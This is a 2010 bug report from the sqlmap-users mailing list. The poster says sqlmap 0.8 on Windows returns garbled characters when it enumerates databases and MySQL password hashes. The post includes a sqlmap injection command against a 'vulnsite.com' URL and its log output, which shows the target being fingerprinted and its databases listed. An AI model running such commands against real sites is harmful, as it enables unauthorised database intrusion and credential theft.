[sqlmap-users] sqlmap .8 bug - Windows
Brought to you by:
inquisb
From: Brandon <bmu...@gm...> - 2010-03-17 18:47:48
|
Well there is a bug when retrieving the databases. When retrieving the databases it tends to retrieve the wrong characters. This bug also is when retrieving the mysql passwords. The program has spaces in some of the hashes as well as "@" in 1 of the passwords. I am on windows xp pro SP3. Here is an example of retrieving one of the wrong characters in the DB name. Mind you .7 worked without any issues grabbing DB's and grabbing mysql passwords. C:\sqlmap8>sqlmap -u vulnsite.com/sites.php?site_id=130 --dbs sqlmap/0.8 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 13:31:01 [13:31:01] [INFO] using 'C:\sqlmap8\output\vulnsite.com\session' as sessi on file [13:31:01] [INFO] resuming match ratio '0.968' from session file [13:31:01] [INFO] resuming injection point 'GET' from session file [13:31:01] [INFO] resuming injection parameter 'site_id' from session file [13:31:01] [INFO] resuming injection type 'numeric' from session file [13:31:01] [INFO] resuming 0 number of parenthesis from session file [13:31:01] [INFO] resuming back-end DBMS 'mysql 5' from session file [13:31:01] [INFO] testing connection to the target url [13:31:05] [INFO] testing for parenthesis on injectable parameter [13:31:05] [INFO] the back-end DBMS is MySQL web server operating system: Linux Fedora 5 (Bordeaux) web application technology: Apache 2.2.0, PHP 5.2.1 back-end DBMS: MySQL 5 [13:31:05] [INFO] fetching database names [13:31:05] [INFO] fetching number of databases [13:31:05] [INFO] retrieved: 21 [13:33:01] [INFO] retrieved: *informa`ion_schema* Thanks |